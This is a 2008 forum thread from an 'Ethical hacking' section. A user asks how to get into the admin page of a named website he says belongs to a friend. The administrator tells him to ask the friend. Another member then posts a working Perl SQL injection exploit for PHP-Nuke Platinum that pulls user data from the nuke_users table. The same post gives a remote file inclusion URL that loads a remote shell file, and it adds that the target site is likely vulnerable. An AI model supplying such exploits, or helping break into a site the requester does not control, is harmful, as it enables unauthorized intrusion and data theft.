1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Admin id and pw...

Discussion in 'Ethical hacking' started by Omen, May 18, 2008.

  1. Omen

    Omen New Member

    Joined:
    May 7, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    There is a site that I would like to get into..
    It is owned by a very good friend of mine and I want to see if Ican get into it..

    here is the link: http://www.udiclan.net/admin.php

    Will someone tell me how I should get in that? :)
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,283
    Likes Received:
    364
    Trophy Points:
    83
    Ask your friend
     
  3. Omen

    Omen New Member

    Joined:
    May 7, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    Do you honestly think he would tell me?

    To be completely honest I really just woud like to know. How and what would I use to get into that site? He is my friend though
     
  4. faizulhaque

    faizulhaque New Member

    Joined:
    May 23, 2008
    Messages:
    213
    Likes Received:
    3
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Karachi
    Home Page:
    Nice Idia Given By Mr. Shabir
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    here u go

    dynamic_titles.php exploit
    Code:
    #!/usr/bin/perl
    #Inphex
    use LWP::UserAgent;
    use LWP::Simple;
    use IO::Socket;
    use Switch;
    #PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
    #nuke_users Structure:
    #user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
    #Description:
    #The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
    #What about PHP-Nukes' SQL Injection Protection?
    #I could bypass its SQL Injection protection.
    #If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
    #You can of course edit the SQL Injection , file write is possible.
    #
    #Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
    print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
    $column = "username";
    $table  = "nuke_users";
    $uid    = 2;
    %cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");
    
    $a = 0;
    foreach  (@ARGV) {
    	$a++;
    	while (($k, $v) = each(%cm_n_)) {
    		if ($_ eq $k) {
    			${$v} = $ARGV[$a];
    		}
    	}
    }
    &getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
    sub getit($$)
    {
    	$url = shift;
    	$reg = shift;
    
    
    	$ua = LWP::UserAgent->new;
        $urls = $url;
        $response = $ua->get($urls);
        $content = $response->content;
    
    	if ($content=~m/$reg/) {
    	    ($f,$s,$l) = split(">>",$1);
    	    $s =~s/ Post //;
    	    print $column.":".$s."\n";
    	}
    }
    


    and

    remote file inclusion vunerabitliy

    Vulnerability Type: Remote File Inclusion
    Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
    Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
    Method: get
    Register_globals: On
    Vulnerable variable: nuke_bb_root_path
    Line number: 24
    Lines:

    ----------------------------------------------
    $phpbb_root_path = 'modules/Forums/';
    include($nuke_bb_root_path . 'extension.inc');
    include($nuke_bb_root_path . 'common.'.$phpEx);



    Unless he has not updated his site platnium which is hte forum he is using is vunerable

    if u dont know how to do then look up how to do it:)
     
    Last edited by a moderator: Jun 12, 2008

Share This Page